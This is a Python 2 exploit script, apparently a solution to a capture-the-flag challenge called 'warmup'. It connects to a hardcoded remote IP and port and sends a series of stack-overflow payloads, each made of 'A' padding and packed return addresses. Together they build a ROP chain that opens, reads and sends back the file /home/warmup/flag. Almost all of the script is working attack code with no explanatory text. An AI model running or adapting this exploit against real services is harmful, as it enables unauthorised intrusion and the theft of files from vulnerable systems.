from codez import *
import socket
import time
#from struct import *

#r = Remote('localhost',1234)
r  =Remote('202.120.7.207',52608)
flag_p = '/home/warmup/flag\x00'.ljust(119,'\x00')
#flag_p = '/tmp//warmup/flag\x00'.ljust(119,'\x00')

buf = 0x08049000
stack = buf + 120
junk = 0x41414141
read = 0x804811D
write = 0x8048135
clean= 0x80481B8 
#r.read('!')

print r.read('!')
p0 = 'A'*(0x34-20)
p0 += pack('I',0x0804811D)
#p0 += pack('IIII',0x804815d,0,buf,len(win_rop))
p0 += pack('IIII',0x804815d,0,buf,len(flag_p))

r.write(p0)
print r.read('!')
#r.write(win_rop)
r.write(flag_p)

p0 = 'A'*(0x34-20)
p0 += pack('I',0x80480d8)#0x0804811D)
p0 += pack('IIII',0,0x804813a,0x80480d8,buf) # dis is open
#p0 += pack('IIII',0x8048112,0,buf,173)

for i in range(10):
    r.write(p0)
    print r.read('!')
    print r.read('!')

print 'spammed'
raw_input('x')
p1 = 'A'*(0x34-20)
p1 += pack('I',0x0804811D)
#p1 += pack('IIII',0x8048112,1,buf,5)
p1 += pack('IIII',0x80481B8,0,buf,5)
p1 = p1.ljust(0x34,'B')


#p += pack('I',)
r.write(p1)
print r.read('!')
r.write(flag_p[:5])

r.read('!')
p0 = 'A'*(0x34-20)
p0 += pack('I',0x80480d8)#0x0804811D)
p0 += pack('IIII',1,2,3,4)
for i in range(10):
    r.write(p0)
    print r.read('!')
    print r.read('!')

p1 = 'A'*(0x34-20)
p1 += pack('I',read)
p1 += pack('IIII',0x80480d8,3,buf,128)
r.write(p1)
print r.read('!')
print r.read('!')
print 'fap'
p0 = 'A'*(0x34-20)
p0 += pack('I',0x80480d8)#0x0804811D)
p0 += pack('IIII',1,2,3,4)
#for i in range(1):
r.write(p0)
print r.read('!')
print r.read('!')

p1 = 'A'*(0x34-20)
p1 += pack('I',write)
p1 += pack('IIII',0,0,buf,128)


print r.write(p1)
r.read('!')

for i in range(10):
    print `r.sock.recv(1024)`